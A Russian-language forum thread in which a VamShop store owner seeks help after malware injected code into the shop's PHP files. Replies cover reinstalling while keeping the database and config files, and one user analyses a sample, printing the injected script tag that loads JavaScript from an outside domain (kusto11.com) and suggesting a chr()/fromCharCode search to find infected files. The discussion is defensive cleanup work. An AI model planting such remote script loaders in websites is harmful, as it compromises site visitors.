Вирус

[verywolfy 0]

Произошла неприятная ситуация - над каталогом в котором лежал скрипт магазина поработал вирус. Суть его заключалась в добавлении всяких строк в программный код магазина.

Удалять эти строки с кодом не представляется возможным - каждый раз они разные. В результате хочу просто стереть каталог и заново переписать скрипт, который когда то инсталлировал.

Сохранилась база. Но когда переписываешь новый код он начинает процесс инсталляции. Подскажите пож-ста каким образом можно не инсталлировать заново а просто скопировать и исправить в настройках.

[support 447]

Так а какая версия магазины была?!

Вы можете сохранить базу, картинку товаров, по-новой переписать все файлы магазина, кроме /includes/configure.php и /admin/includes/cofigure.php

Но если старая версия магазина, то после восстановления старой базы данных на новых файлах, Вам нужно будет базу обновить до версии файлов, т.е. брать из патчей только SQL файлы там где они есть и грузить в базу, т.е. что б довести структуру базы до той же версии, что и файлы, что б ошибок не было.

[verywolfy 0]

Версия была 1,60 но у меня есть оригинал инсталляции.

То есть я правильно понимаю, что из старого каталога можно оставить только перечисленные файлы и базу - все остальное можно заменить на новые файлы из инсталляции?

[support 447]

Да.

Только аккуратней, делайте резервные копии и файлов и базы, что б можно было откатиться к рабочей версии, если что.

[MaZa 10]

уверен на 99% можно с помощью поиска регулярным выражением найти и стереть зловредный код.

представьте пожалуйста варианты зловредного кода (3-4 стринга думаю достаточно будет), я напишу регурялку.

можете сохранить код в txt заархивировать его и выложить сюда или куда нибудь - я скачаю. в аську можете мне написать 4112171.

p.s.: люблю регулярные выражения *crazy*

[verywolfy 0]

прилагаю текстовку кода.

Только вот нюанс - с одной стороны он конечно может быть единственным, а если есть вариации? )))

Я посмотрел касперским - он его определяет как HEUR: Trojan-Downloader.Script.Generic  но вместо лечения только предлагает стереть файл, что естественно нельзя.

текстзловредногокода.rtf.zip

[MaZa 10]

а если есть вариации? )))

потому я и просил 3-4 варианта... я так понял это ваше предположение было. Я вам скажу из своего опыта, обычно вставляют один и тот же код, потому что делается это как правило автоматически, а с вариациями не заморачиваются.

и желательно весь зараженный файл отправьте мне как он есть.

антивирус может только посылание на вирус найти, имхо.

сталкивался уже с подобными проблемами:

[verywolfy 0]

Начал шерстить в файлах php так вылез еще один код левый, прилагаю его в файле.

lendshop.php.zip

[MaZa 10]

данный "вирус", который вы выложили, вставляет в <head> каждые 5 секунд след. код:

<script type="text/javascript" src="http://kusto11.com/js/jquery.min.php#1301467747586"></script>

вот это время в секундах , результат ф.getTime()

#1301467747586

По вышепреведенному адресу нечего загружать потому что веб-сервер оффлайн. (а интересно что там:) )

В общем, по этому этот кусок кода антивирусы и определяют как вирус, потому что это как бы не нормально таким образом яваскрипт подгружать вообще с левого домена да ещё и так геморно строка генерится ( в цикле fromCharCode ).

выложите парочку зараженных файлов. я подумаю как можно сделать массовый поиск по файлам рекурсивно, мультистрочный и с регулярными выражениями :)

[MaZa 10]

знаете, что объединяет все эти вирусы?

chr(), fromCharCode() функции..

я ради интереса запустил поиск программой avsearch искал: "chr,char" (либо то либо то), по всему вамшопу прошёлся - нашёл 69 файлов. из них десяток картинок (почему-то не работает фильтр по расширениям файлов у меня), в общем не так уж много, можно быстро найти зараженные файлы. Интересно сколько у вас найдёт файлов по поиску "chr,char"?